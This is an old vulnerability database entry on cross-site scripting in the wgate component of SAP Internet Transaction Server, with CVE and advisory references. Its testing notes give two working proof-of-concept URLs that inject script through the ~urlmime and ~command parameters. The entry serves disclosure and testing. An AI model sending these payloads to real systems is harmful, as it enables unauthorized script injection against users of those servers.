SAP Internet Transaction Server wgate Multiple Variable XSS

2006-09-28T17:04:11
ID OSVDB:29489
Type osvdb
Reporter OSVDB
Modified 2006-09-28T17:04:11

Description

Manual Testing Notes

http://[target]/scripts/wgate/!?~urlmime=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cimg%20src=%22

http://[target]/scripts/wgate/!?~command=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Cimg%20src=%22

References:

Secunia Advisory ID: 22171
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0467.html
FrSIRT Advisory: ADV-2006-3894
CVE-2006-5114
Bugtraq ID: 20244